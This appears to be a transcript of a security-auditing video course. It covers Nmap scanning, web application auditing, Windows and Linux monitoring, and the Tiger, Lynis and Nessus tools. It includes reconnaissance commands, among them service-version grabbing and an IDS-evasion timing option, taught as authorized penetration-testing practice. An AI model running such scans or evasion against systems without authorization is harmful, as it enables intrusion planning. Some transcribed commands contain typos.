Okay, I'm not sure why that's taking so long. I'm going to do a Ctrl+C to stop that scan. But that's a UDP port
scan, so it should come back with any UDP ports that are open, and I don't suspect there's any UDP ports open
on that system. So the next thing that I want to show you is going back to the SYN scan. I'm going to hit my up
arrow key here. And I'm looking at the SYN scan, now remember what the SYN scan, it came back with all the
ports that were open on that .130 system.
[Video description begins] He clears the screen and then enters the following command: nmap -sS
192.168.67.130 [Video description ends]
Now let's say you're the security person within the organization. Management comes up to you and says, you
know there's a huge exploit against the remote desktop protocol. Do we have any systems running RDP? So
what's kind of cool is as a security professional, you can use Nmap to discover or target specific ports. So I'm
going to do a SYN scan and I'm going to add a -p here and I'm going to say 3389. So management wants to
know, do we have any systems running Remote Desktop? Now in my example, I'm just going to target it
against the 130 system. But we could do it against the whole network, which is what you do in that scenario.
[Video description begins] He clears the screen and then enters the following command: nmap -sS -p 3389
192.168.67.130 [Video description ends]
And notice that the output comes back with just 3389 is open, which is kind of nice. You could also mention
multiple ports or list multiple ports. So for instance, you could use the nmap -p, you could say go scan port
3389, and port 80, right? So if you had specific ports that you were looking for, you could list them as comma-
separated values.
[Video description begins] He enters the following command: nmap -sS -p 3389 ,80192.168.67.130 [Video
description ends]
The other thing that is important as well is I mentioned that Nmap does a ping first. And a lot of times, systems
that don't respond to pings may have ports open, because maybe the ping message is being blocked by a
firewall on the system. So you can tell Nmap not to do pings. Keep in mind, this could go and potentially
increase the time that it takes to perform the port scan. So I do a -Pn for ping none.
[Video description begins] He clears the screen and enters the following command: nmap -sS -Pn-p
3389 ,80192.168.67.130 [Video description ends]
Hit Enter, and that wasn't too bad. I'm just scanning Port 80. So I told it not to do a ping. The next command
that I want to show you is you can also do what we call a version scan. So let me go back to this SS. So if I
wanted to, I could try to find out the version of the software that's running on those ports. Now this will take a
little bit longer because it's essentially doing like a banner grab to find out, okay, port 80 is open. Well what's
the web server software that's running behind port 80. Is it an Apache web server, is it an IIS web server? That
kind of idea.
[Video description begins] He clears the screen and enters the following command: nmap -sV -p
3389 ,80192.168.67.130 [Video description ends]
So you can see here that it's finished the version scan. It'll take a probably about two minutes here and it shows
that Port 80 is open. It's an HTTP service. And notice that we have a new version column. So it's a Microsoft
IIS and it tells you the version of IIS, so that's 7.5. And again, here it shows Port 3389 but notice that they don't
really have any version information for that. So like I said, you can attempt to find the version out with that -
sv. Again, great for pen testers. If you're assessing the security of the organization, you've been authorized to
perform a penetration test, you'd want to not only discover the ports that are open, but you'd also want to know
the software that's running behind those ports. So now I can start researching how to exploit an IIS 7.5.
The last command that I want to mention for Nmap is, let me go back to a SYN scan here. You can also add in
if you wanted to, a -T. And then a number of zero through four. And basically what this is designed to do is to
change the timing of the scan. So for instance, let me get rid of the ports. That way it does all the default ports
or common ports. So I'm going to be scanning the systems, all the common ports. And if you suspect that the
network has a intrusion detection system, you may want to slow down the scan, right? So you could go and do
a T0, specifying that you want to go into what we call paranoid IDS evasion mode, which slows the scan down
to hopefully avoid an IDS picking up on all of your port scanning traffic, right? So this will slow the scan
down a little bit,
[Video description begins] He clears the screen and enters the following command: nmap -sS -
T0192.168.67.130 [Video description ends]
in hopes that we have that avoidance. You can also do something like do a -T4 which is the exact opposite. It's
what we call an aggressive speed scan. And you use it in scenarios where you want to speed up the process of
performing the scan. And you're not worried about detection. So that should run there. That'll come back with
the same kind of results, it'll just take longer. There's a number of other switches with Nmap. It's a small
program, but it has a lot of options with it. So it's a very cool little tool to use as a network professional and as
a security professional.
After completing this video, you will be able to describe how to perform web application auditing and secure
web applications and websites.
Objectives
describe how to perform web application auditing and secure web application and web sites
[Video description begins] Topic title: Web Application Auditing. Your host for this session is Glen E. Clarke.
Screen title: Web Application Audit Tools [Video description ends]
In this video, you will learn about Web Application Auditing. Web applications have taken over the
application platform world for both Internet and Intranet applications. With Internet applications, you're
extending your potential audience to the entire world. So it is important to assess the security of the web
applications. There are a number of tools out there that allow us to assess the security of our web applications
such as Burp Suite or the web application framework. When looking to web application audit tools, you want
to use tools that have the following core capabilities.
First, the web application audit tools should be able to discover the web applications that exist on a system or
even the entire network. This is important because organizations do forget about applications running on
systems and if it has vulnerabilities, it could make the entire system vulnerable to attack. Once the web
applications are discovered, the web application audit tools should be able to find vulnerabilities within those
running applications.
A good assessment tool will give you the capabilities to perform authenticated and non-authenticated
vulnerability scans on the system. Such as cross site scripting vulnerabilities, SQL injection vulnerabilities and
information leakage. Using a web application audit tool on web applications in the development environment
or staging environment can help identify security issues before deployment. But also be sure to perform an
audit of the web application in production as well.
[Video description begins] Screen title: Vulnerability Scanner Features [Video description ends]
With a wide range of tools out there, it's important to understand some of the features that vulnerability
scanners should have as a basic feature set. The first is the ability to determine the web application attack
surface. This involves the tool having a crawler component that crawls through the site and identifies all of the
entry points or pages and directories to the web application. This is a crucial feature because without
identifying the entry points, then the tool wouldn't be able to discover the vulnerabilities.
You want to choose an easy to use vulnerability scanner that does not need a number of configuration settings
applied before you can use it. Having a tool that can automatically detect the most common vulnerabilities
scenarios is an important feature. You also want to select a vulnerability scanner that can accurately identify
web application vulnerabilities with a low number of false positives. A false positive with vulnerability
scanners is when the scanner says there's a vulnerability but really, there's not. You also want to have a
vulnerability scanner that supports automation. Automation allows you to script or automate a security scan
without having to manually run each test yourself.
[Video description begins] Screen title: Identify Web Application Vulnerabilities [Video description ends]
In order to ensure the security of the web application, you must identify the web application vulnerabilities that
exist before a hacker exploits the vulnerabilities on you. This is why you should perform web application
vulnerability detection tasks throughout the entire software development life cycle instead of after it's deployed
to the web server. There are a number of different techniques you can use to identify the web application
vulnerabilities. First, you can use a black box security vulnerability scanner to scan the web applications and
identify vulnerabilities with the web application. This is a great starting point when assessing the web
application's security. You could also do a manual source code audit of the web application code to identify
secure coding issues within the application.
You could use an automated white box scanner where you're performing source code scans and reviews with
the audit as well. You could perform a manual security audit of the web server and the web application
configuration settings. And finally, you could perform penetration tests where you explicitly try to exploit and
compromise the applications running on the web server. Keep in mind it's illegal to hack into any system. So if
you're going to perform a penetration test, be sure you have written authorization from upper level
management or the business owner so that you can prove you had permission. When assessing the web
application security you would typically use multiple methods as each method complements one another. For
example, you could do an automated black box scan and a manual source code audit. The automated scan will
help reduce the time of assessing security, but the manual source code review will allow you to see logical
security issues within the application.
[Video description begins] Screen title: Firewall Limitations [Video description ends]
Organizations today are placing a web application firewall in front of their web servers so that the web
application firewall can analyze the HTTP and HTTPS traffic to identify any malicious traffic or attacks. There
are some limitations to using only a web application firewall as your security strategy. First, it only prevents
known security vulnerabilities by comparing the HTTP traffic against known patterns. This means the web
application firewall is not a good tool to protect against zero-day attacks.
The web application firewall is only as good as the administrator who configures the firewall. If the web
application firewall is not configured properly, it may not be protecting your web applications against
malicious requests. The web application firewall simply blocks requests that are malicious. It does not fix web
application security issues. So it's important to identify and fix the vulnerabilities within the applications
themselves. The last point to make is that the web application firewall can itself have vulnerabilities that are
exploited by a hacker.
[Video description begins] Screen title: Securing the Web Server [Video description ends]
One of the important points to remember about web application security is that the web server is not the only
software running on the machine. You have the operating system and you may have other components such as
a database server, an email server, or an FTP server. The following are some ways to help secure the web
server environment. First, be sure to uninstall unnecessary software and disable unnecessary services on the
system. For example, if you're not using the FTP service and one exists, disable it. Most devices and servers
today allow you to remotely access the system for administration purposes.
If you're not remoting into the system for administration, be sure to disable that functionality. If you are using
remote administration features, then secure it by limiting what IP addresses and protocols can be used to
remote into the server. Always use accounts with least privilege. Instead of having an admin account that can
perform all tasks, we'll be creating an admin account for each job role. For example, you could have a log
reader admin account that has the permission to read log files, but that account cannot make changes to the
web server. This way, if the account is hacked, the hacker would have limited capabilities. Also, be sure to
match the permissions with privileges that should be granted. For example, the web application needs to be
able to read the data from the database server.
So creating an account that only has read permissions in the database and configure that account for the web
application access to database. This will limit what the web server software can do with the database. Other
common practices help create a secure web server environment are to, separate your development environment
from your test environment, from your live environment. This is important because your development
environment typically has trace or debug information that can contain sensitive data useful to the hacker. So
place each environment in their own segmented network. Also, be sure to segregate the data.
This means you should store unrelated data in their own databases, so that you can use different database user
accounts for each database and control who has access to the different databases. The security patches fix
known vulnerabilities within software and should be applied on a regular schedule. Ensure to monitor and
audit the server logs. It's important to configure monitoring auditing on your systems. But also ensure you take
the time to review the logs on a regular basis. And finally, use security tools as part of your day to day
administration. This not only includes security scanners, but network scanners and any lockdown tools for
specific products that will disable unnecessary features of the product. In this video, you learned about web
application auditing.
After completing this video, you will be able to describe how to monitor and audit Windows using audit
policies and the Event Viewer.
Objectives
describe how to monitor and audit Windows using audit policies and the Event Viewer
[Video description begins] Topic title: Windows Security Monitoring and Auditing. Your host for this session
is Glen E. Clarke. [Video description ends]
In this video, you will learn how to monitor and audit Windows using audit policies in the Event Viewer.
Window systems have an audit policy feature that controls how much logging of security related events occur.
You can configure auditing either through the local security policies or deploy the auditing settings to multiple
systems by using group policies within Active Directory. Once you enable auditing for a particular event, you
would then review the audit logs by going to the security log in the Windows event viewer.
No matter the technique used to enable auditing, you do have nine audit policy categories that you can enable
auditing for. For example, account management would be a category. The nine categories are broken down
into 50 different audit policy subcategories. For example, the account management category has subcategories
for enabling auditing of groups as a subcategory or user accounts as a subcategory. Typically, when you set
auditing at a category level, it's then set at the subcategory level by default. This is beneficial in the scenario
where you do not want to go to each subcategory enable auditing individually, but at the same time, you can go
to those subcategory levels and selectively choose which subcategory to enable auditing for.
[Video description begins] Screen title: Top Level Auditing [Video description ends]
Let's take a look at the top level categories that you can enable auditing for. First, we have audit directory
service access which will allow you to audit when somebody accesses Active Directory objects. The benefit of
this category is that if you set this and an application accesses or modifies an object in Active Directory, you'll
know about it in the security log. Next we have audit privileges. A privilege is a right in windows. For
example, if you gave somebody the right to shutdown a server or change the system time and they took
advantage of those rights, you could have it logged to the security log.
This is a great way to keep an eye on tasks performed by your administrative team. Or more importantly, if
someone hacks an administrative account and then performs and administrative tasks, you will know about it if
you've enabled auditing of privileges. We also have the audit policy changes category. This category is used to
log activity related to changes to the security policy of a system. That includes the audit policy itself, but also
security policy settings such as authentication and authorization policy settings. Next we have audit system
events. This category logs system level security events, such as when the state of the security of the system
changes, maybe an IP sec event occurs or there's a system integrity event. Some other event categories that you
have at the top level are we can audit account logon events. This category is used to log authentication events
to a local database, such as when a user account logs on to Active Directory if you enable this on the domain
controller.
If you enable account logon events on a workstation, then the local database is the same database. Next, we
have audit logon events. Logon events are triggered after you've authenticated and when you access a system
from across the network, such as accessing a shared folder on a server. The system you connect to logs or
logon event as it verifies your authentication information. Next we have audit process tracking. This event
category is used to track programs that execute on the system either by the end user or the system itself. Some
examples of subcategories in this category are process creation and process termination which allow you to see
how long the program was running.
Next, we have audit object access. If you want to audit access to objects in Windows such as files, folders,
printers, and registry keys, you can enable audit object access. Note that after you enable audit object access,
you will then go to the specific file, folder, printer, or registry key, to enable auditing on that specific resource.
And finally, we have audit account management. You can enable auditing of account management which
allows you to monitor when somebody modifies properties of an account object such as a user account or a
group. This category has subcategories such as user account management, computer account management,
security group management, and distribution group management, to allow you to fine tune what types of
objects you wish to audit. The account logon event category has a few subcategories that are worth
[Video description begins] Screen title: Account Logon Events [Video description ends]
mentioning. First, we have the credential validation subcategory which will audit authentication request to an
Active Directory system using NTLM as the protocol or authentication to a local sand database on a Windows
system. Next, we have the Kerberos authentication service. Enabling auditing for this event will audit when a
Kerberos ticket granting ticket request is received. If enabled on a domain controller, you will see the ticket-
granting ticket request that is part of the logon process, which includes the IP address of the system, use the
ticket request. We also have the Kerberos service ticket operations, which allows you to audit when Kerberos
is used to authenticate a user who's trying to access a resource on a system such as a shared folder or a printer.
And finally, we have the other account logon events, which at this time does not have any events that are
audited and is intended for future use. The audit logon events category is broken down into a number of
subcategories.
First, we have logon, which audits when a log on session is created. For interactive logons, the event is logged
on the local computer but when accessing a resource on the network, the event is recorded on the system that
contains the resource. Next we have logoff, which is similar to the logon event as far as where the events are
recorded, but it occurs when a logon session is terminated instead of created. Then we have the account
lockout event, which is used to log when an account cannot logon due to the fact that the account has been
locked out. Next, we have special logon which is used to audit special log on scenarios such as log on activity
from an account with administrator equivalent privileges or a logon from a special group that you can specify
in the registry. You can also use the other logon/logoff events category to audit things like remote desktop
session connects and disconnects, a workstation being locked or unlocked, and a screen saver being invoked or
dismissed.
Then we have a number of IPSec event categories such as IPSec main mode, which generates events when an
IPSec main mode security association is established. We have IPSec quick mode, which generates events when
IPSec quick mode security associations are established. And then we finally have IPSec extended mode, which
generates events when IPSec extended mode security associations are established. As a final event category,
we have network policy server subcategory which allows you to audit events related to radius authentication
and network access protection. In this video you learned about how to monitor and audit Windows using audit
policies in the event viewer.
Upon completion of this video, you will be able to describe how to monitor the Linux system by reviewing
system logs.
Objectives
describe how to monitor the Linux system by reviewing system logs
[Video description begins] Topic title: Linux Security Monitoring. Your host for this session is Glen E. Clarke.
Screen title: Linux Security Monitoring Tools [Video description ends]
In this video, you'll learn how to monitor the Linux system by using a number of the tools that exist in Linux.
There are a number of tools available to allow you to monitor different aspects of the Linux system. Because
there's so many different Linux tools used for monitoring, we're dividing them up into the following categories.
First, we have Command line tools. There are a wide range of tools you can access from the terminal and
execute as commands, such as top to view the processes and threads that are running.
We have Log monitoring tools. There are log monitoring tools that you can use to find out the cause of
software errors on the system or server. Network manager tools allow you to diagnose networking issues with
the system, such as determining the settings on the network interfaces. We have Performance monitoring tools.
The Performance monitoring tools allow you to monitor and manage the health and performance of the Linux
system with tools that allow you to monitor things, such as the processor and memory usage. Server
monitoring tools allow you to monitor and maintain servers in your network infrastructure. And finally, we
have Network monitoring tools. Network monitoring tools allow you to monitor characteristics of the network,
such as analyzing network traffic and bandwidth usage.
[Video description begins] Screen title: Command Line Tools [Video description ends]
There are a wealth of different command line tools that are available within different Linux distributions. Some
common tools for monitoring our, first we have Top. Top comes pre-installed on most Linux distributions and
is a performance monitoring tool that shows memory usage, CPU usage, and characteristics and elements, such
as swap memory, and process information of running processes. PowerTOP is a Linux tool that allows you to
monitor and diagnose problems with power consumption on the system and power management settings. Iotop
is a Python script that shows I/O usage such as disk I/O for processes and threats. And finally, we have Ftptop,
which allows you to monitor the FTP sessions with your Linux based FTP server.
[Video description begins] Screen title: Network Monitoring Tools [Video description ends]
There are also a number of network monitoring tools used by the many flavors of Linux. Here are a few tools,
first, we have Jnettop, which allows you to monitor network traffic and bandwidth usage. If the Linux system
is acting as a router, Jnettop will allow you to view the routing table of the system. Ntopng is the next
generation version of Ntop and is a tool with a web based GUI that allows you to visually monitor network
usage and traffic. Ethtool is a tool that allows you to manage ethernet devices, such as obtaining identification
information on the device and diagnostics information.
Ethtool can also be used to control settings on a network interface, such as the speed and duplex settings. And
finally, we have IPTraf. IPTraf is a utility that's used to analyze packet information traveling across the
network. IPTraf can be used to give information, such as byte counts, TCP flag information, ICMP packet
summary, and TCP and UDP summary information, as well.
[Video description begins] Screen title: Server Monitoring Tools [Video description ends]
Any time you're responsible for managing a Linux server, you will most likely need to use some of the server
monitoring tools to troubleshoot and monitor the health of the server. Some common tools for monitoring a
Linux server are, first, we have Linux Dash, which is used to display important server performance
information, such as running processes, CPU and memory usage, file system information and bandwidth used.
Wireshark is an important tool for any network administrator or support person, as it allows you to capture
network traffic and analyze the network packets that are in that packet capture. Glances is a performance
monitoring tool that allows you to monitor the health of your system, including information on processes that
are running, CPU and memory usage, and network bandwidth statistics. Finally, we have Nagios, which is a
third-party tool that allows performance monitoring of not only the Linux system but remote systems such as
Windows machines, routers, switches, and printers.
[Video description begins] Screen title: Log Monitoring Tools [Video description ends]
Most operating systems log activity to log files such as security events or regular usage activity and Linux is
no different. There is a number of Log Monitoring Tools available for the Linux platform. First, we have Sarg,
which is an HTTP proxy log analyzer that allows you to monitor Internet sites that users are visiting. vnStat is
a free Network Traffic Monitoring tool that analyzes network traffic and keeps a log of network statistics for
the interface that you choose.
GoAccess is a web access log analyzer that monitors web access log from a number of different products, such
as Apache, Amazon S3 and CloudFront. GoAccess can be used to output summary information and statistics to
a JSON file, an HTML file, or a CSV file. Simple Log Watcher is a tool designed to monitor the system logs
on a Linux system by configuring a regular expression for the content you're interested in, and when a match
occurs in the log, the system administrator is emailed. Logwatch is a Linux monitoring tool that analyzes the
logs and allows you to create a custom report based on the log content.
[Video description begins] Screen title: Network Manager Tools [Video description ends]
There are a number of network manager tools that allow you to configure aspects of the networking
environment on a Linux system. First, we have ifconfig, which is used to view and modify the IP configuration
settings on the Linux system. Network Tools is an advanced network diagnostic tool that allows you to
troubleshoot network related issues with your Linux system. Wicd has become the de facto network manager
in many Linux distributions as it allows you to configure many IP settings on the system, including advanced
network settings. And the GNOME Network Manager is a network manager that comes with Ubuntu and the
GNOME desktop environments, it allows you to manage basic network settings, such as the configuration
settings on the network interfaces.
[Video description begins] Screen title: Performance Monitoring Tools [Video description ends]
There are a number of performance monitoring tools available in Linux systems that allow you to monitor the
health of the Linux system. First, we have the GNOME System Monitor, which is a Linux task manager that
simplifies viewing information, such as hard disk space usage, RAM usage, and processes that are running.
Sysstat is a performance monitoring tool that consolidates information from many other monitoring tools and
includes information, such as CPU, RAM, and swap usage, it monitors sockets and kernel activity as well as
aspects of the file system. VnStat PHP is a network traffic logger that has a web based GUI to analyze network
traffic patterns. And finally, we have Observium. Observium is used to discover devices on the network
including Linux, Windows, and Cisco devices, and provides a graphical environment to monitor the health and
status of all the devices from a centralized tool. In this video, you learned about the Linux monitoring tools.
[Video description begins] Topic title: Linux Security Auditing. Your host for this session is Glen E.
Clarke. [Video description ends]
In this demonstration, we'll take a look at how to install and run Tiger to perform a security assessment of the
Linux system. Tiger is a security tool that assesses the Linux system for security configuration problems by
running a set of scripts that scan the system. Tiger can identify security issues related to accounts, permissions,
ownerships of files, firewall settings, and many other security configuration settings. Let's start by installing
Tiger. I'm on the Linux Mint system here, and down bottom I'm going to click on the terminal window. Once
in the terminal window, let me go and change our View settings here, just so we can see this a little bit better.
[Video description begins] A terminal window labeled "student@LinuxMint:~" opens. The command prompt
in the window reads: student@LinuxMint:~$. [Video description ends]
Here we go. Once in the terminal window, to install Tiger, we're going to use the sudo command, and call
upon the install tiger.
[Video description begins] He enters the following command: sudo apt install tiger [Video description ends]
The Tiger installation only takes a minute. It's a pretty quick install. Once Tiger has completed installation,
now what we want to do is we want to run the Tiger program. So we're going to use sudo tiger. Now what
Tiger does is it has a number of configuration files where it's already configured to scan different aspects of the
Linux system. So it'll go and check things like any security issues related to user accounts, any permission type
of issues, any issues with ownership of files, it'll check firewall settings. So it'll go and scan and do a complete
assessment of your system and write the results to log files. And then you can go and view the log files. Let's
go and run this.
[Video description begins] He enters the following command: sudo tiger [Video description ends]
And you can see here that it's starting to scan up, it's checking the password files, checking group files,
checking user accounts. Checking the rhosts file and so on. So this is going to take a few minutes. And then
after that, you can check the log file to see what kind of security issues exist with your system. So I'm going to
pause the video, it'll probably take about four minutes here. So I'm going to pause the video, and then I'll
resume it once it's done. Okay, so the scan is completed. It took probably four or five minutes to complete.
And I just want to kind of scroll up here and take at look at some of the messages that have come up as the
scan was being performed. Because it indicates the types of security checks that it's performing. So you can see
here that it checked the password files, the user accounts, the rhost file, as I mentioned earlier. But it's also
check things like the path settings, checking to see if FTP is set up for anonymous access. Checks our cron
entries. Also, what's kind of nice here is it checks permissions and ownership for any security issues. And then
what I love here is that Tiger also checks for indications of break-ins. So not only is it a security configuration
checker, but it also is an intrusion detection system, so it will check to see if there's any kind of clues or
indications of a security compromise.
As I scroll down here, towards the end, it completes the scan. And then it also tells you that it wrote the results
to a log file, and it gives you the path to the log file. Now every time you run the scan, you'll have a different
log file name because it is based off the date and the time. So what I want to do here is just play the contents of
the log file, so I can use the cat command to display the log file. So I'm going to do var/log/tiger.
Okay, so I specify the path to the log file, hit Enter. And then you can scroll through the log file and view the
results of the scan. So I'm going to go towards the top here. So just a couple examples here, you can see there's
a warning, and they've got a code, it's a boot06 is the code, and then they give you what the message or the
information is that's related to this security issue. So it says, The Grub bootloader configuration file does not
have a password configured. So there's an example of a configuration setting that's not good from a security
point of view. So as you scroll through, you can see the different warnings.
So here's another warning. There are no umask settings for the init.d scripts, right? And so on. So you can
scroll through the results, and kind of see the messages that indicate any kind of security issues that may exist
with this Linux system. So in this demonstration you saw how to run Tiger as a security configuration checker.
After completing this video, you will be able to describe guidelines and standards for defining cyber security
audit strategies.
Objectives
describe guidelines and standards for defining cyber security audit strategies
[Video description begins] Topic title: Cyber Security Audit Strategy. Your host for this session is Glen E.
Clarke. [Video description ends]
In this video, you'll learn about guidelines and standards for defining cyber security audit strategies. The
purpose of a cyber security audit is to provide upper level management with an accurate assessment of the
company security policies and procedures, and their effectiveness to create a secure cyber security posture.
Part of the cyber security audit is to perform a risk assessment. Which has a primary goal of communicating
the level of risk that exist with all the critical assets within the company. The other goal of the risk assessment
is to identify how to respond to risk by creating a risk strategy plan.
This may involve responding by implementing security controls to mitigate the risk. Or transfer the risk. Or
even accept the risk. Organizations will typically perform two types of cyber security audits, an internal audit,
using internal staff to perform the audit, and an external audit that uses a third party company. It's
recommended to do a mix. Now, for example, maybe even every six months you perform an internal audit but
every two years use a third party company and do an external audit. This allows you to save on audit fees but
still have the viewpoint of a third party auditor every few years. With both types of audits, the goal is to obtain
recommendations on how to improve security within the organization.
[Video description begins] Screen title: Cyber Security Responsibilities [Video description ends]
When we talk about cyber security within an organization, cyber security has three critical goals for the
company. The first goal of cyber security within the organization is, to protect any sensitive or confidential
data and intellectual property. Using cyber security methodologies you want to protect network resources and
prevent these network resources from being hacked or involved in a security incident. And finally, you want to
ensure there is accountability within your environment including accountability with devices and the data
owned by the organization.
[Video description begins] Screen title: Cyber Security Audit Scope [Video description ends]
When performing your cyber security audit, you want to determine the scope of the audit. Some key areas that
a cyber security audit typically includes, are assessing the data security policies for the network database, and
applications that have been deployed within the organization. Reviewing the data loss prevention measures that
exist. Looking at the network access controls that have been implemented and other security controls that are
in place to protect company assets. You want to review the detection and prevention systems that have been
configured to detect malicious activity and response. And then finally, you want to review the incident
response program that's been implemented and look for ways to improve it.
[Video description begins] Screen title: Cyber Security Audit Best Practices [Video description ends]
When planning for, or performing a cyber security audit, there are a number of audit best practices that should
be followed. First, be sure that security professionals are properly trained on cyber security and cyber security
threats and incident response. Be sure to take a holistic approach to cyber security threat assessment. In today's
day and age devices are all interconnected together and many appliances have embedded technologies. So be
sure to address the bigger picture and not just one technology.
Auditors should be familiar with credential theft techniques used by hackers such as Pass the Hash, token
impersonation, and man-in-the-middle attacks. Where the attacker captures the credentials and then uses those
credentials to authenticate to other systems on the network. Some other important cyber security audit best
practices are cyber security auditors should leverage existing frameworks and guidelines. There are a number
of cyber security and threat assessment guides that have been published by NIST, for instance. For example,
the framework for improving critical infrastructure cyber security that auditors can use as a guidance to make
the audit more manageable. Auditors should look to existing regulations and forthcoming regulations and
incorporate those practices into their audit. For example, the Payment Card Industry Data Security Standard, or
PCIDSS, is a set of security standards for companies that accept, process, or store credit card information.
When performing the threat assessment and determining risk, auditors should always associate a threat with
the vulnerability. Bottom line is that the threat exists because the vulnerability is there and has the potential of
being exploited. Remember that the biggest security risk to the organization are the employees. Investing in
security awareness training will increase the security knowledge and awareness of the entire organization as a
result and increase the security posture of the organization. A few other cyber security best practices that
should be followed always remember that the basic security principles still hold true and have been tried and
proven time and time again.
For example, implementing a defense in depth strategy and following the principle of least privilege, is
effective in any environment. It's important to fully test your incident response plan to be sure that everyone
knows the role when an incident occurs. Performing regular test allows staff to keep the response processes
fresh in their minds, which will decrease the time it takes to respond when an actual incident occurs. The last
point to make is that your cyber security strategy must be agile, meaning that your cyber security strategy must
be adaptable and scalable, because attacks are constantly mutating and new attack methods are constantly
discovered by the hackers. In this video, you learned about defining cyber security audit strategies.
Learn how to compare available security audit tools, outlining their features and benefits.
Objectives
compare available security audit tools and outline their features and benefits
[Video description begins] Topic title: Security Audit Tools. Your host for this session is Glen E. Clarke.
Screen title: Security Audit Tools Goals [Video description ends]
In this video, you will learn about the available security audit tools and their features. There are a number of
different types of security auditing tools with each of the tools being designed for a very specific purpose.
First, we have general security auditing tools, which are tools that will be used to assess the security
configuration of your environment and let you know if you have any settings that are poor security practices.
For example, a security auditing tool may assess the security configuration of your server and determine that
you have too many administrative accounts.
There are tools that can help you perform extensive health scans of your system and provide system hardening
functionality in compliance testing such as testing for PCI, HIPPA, and SOX compliance. These are known as
compliance testing tools. We also have penetration testing tools. There are a number of tools out there that will
aid in performing penetration testing. Whereas a security professional, you're assessing security by trying to
exploit approved targets on your network. We also have vulnerability detection tools. Another common form
of security assessment is a vulnerability assessment we don't try to exploit the system, but just identify the
vulnerabilities that exist with the systems on the network. And finally, we have system hardening tools that are
used to help lock down your systems by removing unnecessary features or software to limit the attack surface
of the system.
[Video description begins] Screen title: Security Auditing Tools Audience [Video description ends]
There is a large range of professionals that would use any of the security auditing tools at any point in time.
Developers may use security auditing tools to test vulnerabilities with web applications being developed or
deployed. IT auditors use a number of tools to assess the security posture of a system or network. And then
give recommendations on how to better improve that security. System administrators can use the security
auditing tools on a daily basis to assess the health of the system or discover new vulnerabilities with the
system. And penetration testers use the tools to discover target systems for the penetration test, identify
weaknesses on those systems and then exploit the systems.
[Video description begins] Screen title: Security Audit Tools [Video description ends]
Let's take a look at some common security auditing tools. First, we have Lynis which is an open source
software that can perform health scans, system hardening and compliance testing of Linux and macOS
systems. Lynis can be used in security audits, compliance testing, vulnerability detection and system
hardening scenarios. Bastille Linux is a Linux hardening utility that helps automate the process of locking
down and hardening your Linux systems. OpenVAS and Nessus are examples of vulnerability scanners. They
discover running software and services on the system, and check those systems against the vulnerability
database for known vulnerabilities and missing patches. And finally, we have Tiger. Tiger's similar to Lynis as
it's a security auditing tool that's used to test the security of your Linux system.
[Video description begins] Screen title: Lynis Features [Video description ends]
Lynis is an up-to-date security auditing tool that has many features. First, it has a vulnerability scanning feature
that allows you to passively discover weaknesses on the system and report it to the auditor. Passive testing is
important as the tool is not actually actively attacking the system in this scenario, it's only assessing the
security.
You can customize the action plan which is the types of tests that are performed by the security tool. A very
cool feature of Lynis is that it can detect traces of an intrusion using heuristic and anomaly detection methods.
And finally, the data is stored in log files, but Lynis has a security dashboard that presents the information in
an easy to read manner. Some other security audit features offered by Lynis to help improve the security of
your environment are. First, Lynis has system hardening services that provide pre-made scripts that can run on
systems and be used to harden those systems, making them more secure.
Lynis provides centralized administration through an interface that allows you to gather and view the security
information from a central screen. Reporting is key to security testing, as managers are going to want to have
some form of output that validates the security posture of the organization. Lynis has security report
capabilities with pre-made reports ready to go. Monitoring the security of your systems is a process that should
never end. So Lynis provides continuous monitoring features that allow for ongoing detection of security
problems. In this video, you learned about the available security audit tools and their features.
use the Nessus audit tool to run a Nessus security system scan
[Video description begins] Topic title: Nessus Audi Tool. Your host for this session is Glen E. Clarke. [Video
description ends]
In this demonstration, we'll take a look at how you can use Nessus to perform a vulnerability scan of a system
or network. The first thing that I want to point out is that Nessus is either a commercial product that you have
to purchase, or there is a home edition that you could use for personal use on your home network. I'm going to
show you how you can download and use the home edition because it is free. So to download the Home
Edition we use Nessus' home download.
[Video description begins] The screen displays the Google page in the Mozilla Firefox browser. [Video
description ends]
If we type that into Google it'll go and come up with our results here. And you'll get a link on the Tenable.com
website for the downloads link. So I'm going to click on that, and then you'll choose what it is that you're
trying to download from Tenable. So we do want to go and download Nessus, so
[Video description begins] A page titled "tenable" displays. It displays a list of options including "Nessus",
"Nessus Agents", and " Nessus Network Monitor". Each of the options listed has a "View Downloads" link on
the right. [Video description ends]
we do have the View Downloads link. And when you choose the View Downloads,
[Video description begins] The "Download Nessus" page displays. It lists configuration details. [Video
description ends]
what I want to notice first off is you do need an activation code. So even with the Home Edition, you will have
to fill out a form here give your email address, and they'll send you an activation code that you'll have to use
the first time that you run Nessus. I've already done that I have my activation code and I've already installed
Nessus. So I'm just giving you a quick little tour here of how that was performed. Then you'll go and download
the version of Nessus for the platform that you're running. So they do have Nessus for the different platforms,
so you can choose the download the one that kind of suit your needs. Once you download it, then you'll have to
install it. So to install it the software, what we'll do is we'll minimize her browser there, let me go into a
terminal session. Now I am using Kali Linux as my platform to perform my Nessus scan.
[Video description begins] A terminal window titled "root@kali:~" displays. [Video description ends]
So first thing I want to do is by default that the download to your downloads folder, so let me go into the
Downloads folder. And again, you can see here that I do have Nessus already installed or downloaded. Now
it's also already installed, but
[Video description begins] He types the following command: "cd Downloads" and "ls -l" in the next command
prompt. [Video description ends]
to install it I can use the dpkg -i and then specify the programs that you want to install. So in our case here, it's
going to be Nessus, and then I can hit Enter, it'll start the installation. And then after installation, what you
want to do is make sure that the Nessus services running. So after the installation, to make sure that the service
is running, you can use the service nessusd, for daemon, status command. And that'll will show you what the
service status is, and
[Video description begins] He enters the following command: service nessusd status [Video description ends]
we can see here that in my case the service isn't started. So I've done the installation. The service isn't running,
so I do need to start that service. So I can do a service nessusd, start to start the service.
[Video description begins] He enters the following command: service nessusd start [Video description ends]
Now once the service is started, what happens is that it runs the Nessus product on a port that you can access
the web administration console for. So by default, the port number is 8834, so at this point, what I'm going to
do is go back to my browser. And let me go into https, 127.0.0.1, and again by default it's port 8834. Now the
first time that you run this, what's going to happen is is that it's going to go into like an initialization in an
installation kind of phase. Where it's installing the plugins and each plugin gives Nessus the capability to scan
different types of platforms for different types of vulnerabilities. So the next thing that I have to do here, is I
have to login. Now the first time that you run Nessus it does ask you to create a login. So I've already created
my login for my admin account. So I created a user called admin and set a password, so I am going to login.
[Video description begins] The Nessus homepage displays. It contains two tabs "Scans" and "Settings" on the
title bar. Below the title bar are three buttons namely, Import, New Folder, and New Scan. The navigation
pane lists the following options underneath the heading "FOLDERS": My Scans, All Scans, and Trash. And
the options: Policies, Plugin Rules, and Scanners under the heading "RESOURCES". Currently, My Scans is
